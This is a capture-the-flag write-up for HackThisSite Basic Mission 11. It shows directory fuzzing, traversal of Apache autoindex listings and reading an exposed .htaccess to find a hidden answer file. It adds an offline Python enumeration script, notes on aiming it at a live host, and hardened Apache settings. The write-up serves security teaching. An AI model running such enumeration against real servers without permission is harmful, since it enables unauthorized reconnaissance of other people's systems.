Back to list
CTF / Very Easy

HackThisSite — Basic Mission 11

ducky
2026-05-19


Reconnaissance

The page shows no input or submit button, just text. No obvious injection point, so the attack surface is the directory structure itself.


Step 1 — Directory Fuzzing with Burp Suite

Fuzzed single letters (a-z) at:

/missions/basic/11/<letter>

/e returned 301 Moved Permanently. That is Apache's mod_dir redirecting a request for an existing directory to its trailing-slash form, so a 301 on a slashless name means a valid directory.

Navigated to:

/missions/basic/11/e/

→ Apache directory listing (mod_autoindex) enabled. Found subfolder: l/


Step 2 — Manual Traversal

Followed the rabbit hole:

/e/ → /l/ → /t/ → /o/ → /n/

At /e/l/t/o/n/ the listing shows no entries. Looks like a dead end.


Step 3 — Fuzz Again (Online URL Fuzzer)

Fuzzed /missions/basic/11/e/l/t/o/n/ for hidden files.

Found: .htaccess (HTTP 200). A stock httpd.conf denies every .ht* file, so a 200 here already means the default was overridden somewhere.

Contents:

IndexIgnore DaAnswer.* .htaccess
<Files .htaccess>
require all granted
</Files>

IndexIgnore DaAnswer.* → IndexIgnore only hides matching names from the autoindex listing; it does not deny requests for them. The "empty" listing at /n/ was hiding a DaAnswer.* entry all along, and the glob gives away the name: DaAnswer plus some extension.

<Files .htaccess> require all granted → this block is what overrides the server-wide deny on .ht* files and makes the .htaccess readable in the first place.


Step 4 — Access DaAnswer

/missions/basic/11/e/l/t/o/n/DaAnswer/

Response: "The answer is somewhere! Just look a little harder."

The password is the word somewhere, taken literally from that sentence.
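
The whole chain from Step 1 to Step 4, as an added script that is not part of the original writeup: letter fuzzing keyed on the 301, walking the autoindex listings, reading .htaccess, turning the IndexIgnore glob into concrete names and requesting them directly. It runs offline against a constructed response map that mirrors what the steps above report; every path, body and helper name in it is an assumption for illustration, not a capture from the site.

```python
"""Replay of the Basic Mission 11 recon chain against an offline stand-in
for the target. Added example, not code from the original writeup; the
response map and the helper names are constructed for illustration."""
import re
import string

BASE = "/missions/basic/11/"
HTACCESS = "IndexIgnore DaAnswer.* .htaccess\n<Files .htaccess>\nrequire all granted\n</Files>\n"
HREF = re.compile(r'<a href="([^"?][^"]*)"')   # skips the ?C=... sort links

def _listing(*names):
    # Stand-in for a mod_autoindex page: sort link, parent link, then one
    # anchor per entry IndexIgnore did not hide. Constructed, not captured.
    rows = ['<a href="?C=N;O=D">Name</a>', '<a href="../">Parent Directory</a>']
    return "\n".join(rows + ['<a href="%s">%s</a>' % (n, n) for n in names])

# Constructed site map mirroring what the writeup reports: path -> (status, body).
FAKE_SITE = {
    BASE + "e/": (200, _listing("l/")),
    BASE + "e/l/": (200, _listing("t/")),
    BASE + "e/l/t/": (200, _listing("o/")),
    BASE + "e/l/t/o/": (200, _listing("n/")),
    BASE + "e/l/t/o/n/": (200, _listing()),   # looks empty: IndexIgnore at work
    BASE + "e/l/t/o/n/.htaccess": (200, HTACCESS),
    BASE + "e/l/t/o/n/DaAnswer/": (200, "The answer is somewhere! Just look a little harder."),
}

def fetch(path, site=FAKE_SITE):
    """Offline fetcher: (status, body). Like mod_dir, an existing directory
    requested without its trailing slash answers 301; unknown paths are 404."""
    if path in site:
        return site[path]
    if not path.endswith("/") and path + "/" in site:
        return 301, ""
    return 404, ""

def fuzz_letters(directory, fetch=fetch):
    """Step 1: one request per letter; a 301 on a slashless name is Apache
    telling you that name is a directory."""
    hits = {}
    for letter in string.ascii_lowercase:
        status, _ = fetch(directory + letter)
        if status != 404:
            hits[letter] = status
    return hits

def listing_entries(body):
    """Entry names from an autoindex page, minus the parent link."""
    return [h for h in HREF.findall(body) if h != "../"]

def walk(directory, fetch=fetch):
    """Step 2: follow subdirectories until a listing shows none; return the leaves."""
    leaves, stack = [], [directory]
    while stack:
        current = stack.pop()
        status, body = fetch(current)
        if status != 200:
            continue
        subdirs = [e for e in listing_entries(body) if e.endswith("/")]
        stack.extend(current + s for s in subdirs)
        if not subdirs:
            leaves.append(current)
    return leaves

def index_ignore_patterns(htaccess):
    """Step 3: IndexIgnore globs name what the listing hides, not what is denied."""
    patterns = []
    for line in htaccess.splitlines():
        parts = line.split()
        if parts and parts[0].lower() == "indexignore":
            patterns.extend(parts[1:])
    return patterns

def probe_hidden(directory, patterns, fetch=fetch,
                 suffixes=("/", "", ".txt", ".php", ".html")):
    """Step 4: turn each glob into concrete names and request them directly."""
    found = {}
    for pattern in patterns:
        stem = pattern.split("*")[0].rstrip(".")   # "DaAnswer.*" -> "DaAnswer"
        for suffix in (suffixes if stem else ()):
            status, body = fetch(directory + stem + suffix)
            if status == 200:
                found[directory + stem + suffix] = body
    return found

def run(fetch=fetch):
    """Chain the steps: (letters that hit, {leaf dir: (patterns, hidden files)})."""
    letters = fuzz_letters(BASE, fetch)
    results = {}
    for letter in letters:
        for leaf in walk(BASE + letter + "/", fetch):
            status, htaccess = fetch(leaf + ".htaccess")
            if status == 200:
                patterns = index_ignore_patterns(htaccess)
                results[leaf] = (patterns, probe_hidden(leaf, patterns, fetch))
    return letters, results
```

To run it against a live host, swap fetch() for an HTTP client that carries your session cookie and does not follow redirects, otherwise the 301 that marks a directory is swallowed and you only ever see the final 200. The suffix list in probe_hidden is a guess at what the `.*` part of the glob might be; widen it if the first pass finds nothing.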


Step 5 — Find the Submit Form

No form on the main page. Tried:

/missions/basic/11/index.php

→ Password input field found. Submitted somewhere → Congratz!


Root Cause

Three misconfigurations chained together:

  1. Apache directory listing enabled (Options +Indexes): exposes the whole folder tree to anyone who can guess the first directory name
  2. .htaccess publicly readable (the file's own <Files> block grants it): leaks the IndexIgnore rule and with it the name of the file it was meant to hide
  3. "Password" stored in a web-accessible directory: once named, it is one GET away; IndexIgnore is cosmetic, not access control

Key Takeaway

Disable Apache directory listing (Options -Indexes) and set AllowOverride None wherever .htaccess is not needed, so a per-directory file cannot re-grant access. Leave the stock <Files ".ht*"> Require all denied in place; .htaccess files often reveal more about the server layout than intended. Treat IndexIgnore as cosmetic: it hides names from the listing and nothing else. Never store secrets under DocumentRoot; anything there is one URL away.
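
The weak settings next to the hardened ones, as an added Apache configuration example that is not taken from the mission's real server (the directory paths and the AllowOverride value are assumptions; the deny on .ht* files is the httpd.conf default shipped with Apache):

```apache
# What the mission's tree is effectively running (assumed paths, not the
# real server config): listings on, .htaccess consulted and readable,
# the "secret" inside DocumentRoot. IndexIgnore only hides names from
# the listing; the files stay servable.
<Directory "/var/www/html/missions/basic/11">
    Options +Indexes
    AllowOverride All
    IndexIgnore DaAnswer.* .htaccess
</Directory>
# This is what the leaked .htaccess did: re-grant access to itself.
<Files ".htaccess">
    Require all granted
</Files>

# Hardened equivalent
<Directory "/var/www/html">
    # No autoindex: a directory without an index file answers 403, not a listing.
    Options -Indexes
    # .htaccess is not consulted at all, so it cannot re-grant anything.
    AllowOverride None
</Directory>
# Stock httpd.conf default; keep it and never override it per directory.
<Files ".ht*">
    Require all denied
</Files>
# Secrets live outside DocumentRoot and reach the application through its
# own configuration, never through a URL path.
```

Apache comments must sit on their own lines; a trailing comment after a directive is parsed as an extra argument and breaks the config, so the notes above are kept on separate lines.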

Tags: #hackthissite #Basic Mission 11 #basic-mission-11
